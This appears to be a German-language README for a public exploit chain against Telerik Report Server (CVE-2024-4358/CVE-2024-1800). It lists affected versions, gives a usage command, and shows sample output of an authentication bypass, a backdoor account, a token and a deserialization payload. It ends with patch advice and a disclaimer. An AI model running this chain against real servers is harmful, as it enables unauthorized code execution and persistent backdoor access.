
Progress Telerik Report Server vorauthentifizierte RCE-Kette (CVE-2024-4358/CVE-2024-1800)
Telerik Report Server Deserialisierungs- und Authentifizierungs-Bypass-Exploit-Kette für CVE-2024-4358/CVE-2024-1800
Eine Root-Cause-Analyse der Schwachstelle finden Sie in meinem Blog poc
Im Grunde alle zum Zeitpunkt der Veröffentlichung des Exploits. Für zukünftige Referenzen, alle Haupt-/Nebenversionen in der folgenden Liste:
2012
2017
2018
2019
2020
2021
2022
2023
2024
python CVE-2024-4358.py --target http://192.168.253.128:83 -c "whoami"
(^_^) Progress Telerik Report Server pre-authenticated RCE (CVE-2024-4358/CVE-2024-1800) || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) random backdoor username: oelycslyun
(*) random backdoor password: cqgnacxljo
(*) Attempting to bypass authentication
(+) Authentication bypass was successful, backdoor account created
(+) Saving credentials to credentials.txt
(+) Successfully authenticated as oelycslyun with password cqgnacxljo
(*) got token: zfCch_LNv0PyKfe7eBDYKXV70IOotwNQ2p82aX-JHIMCisVnTW9PWWYUKljhcRw5alubNOg_gXoHT6-hJk4VO-jGZuzmisLIi5A
(*) Generated random report name: qvwdycugmc
(*) Creating malicious report under name qvwdycugmc
(*) Deserialization exploit finished
Aktualisieren Sie auf die neueste Version oder ergreifen Sie Gegenmaßnahmen gemäß den Anweisungen im Progress Advisory
Diese Software wurde ausschließlich für Zwecke der akademischen Forschung und zur Entwicklung effektiver Verteidigungstechniken erstellt und ist nicht dazu bestimmt, Systeme anzugreifen, sofern nicht ausdrücklich autorisiert. Die Projektbetreuer übernehmen keine Verantwortung oder Haftung für Missbrauch der Software. Verwenden Sie sie verantwortungsvoll.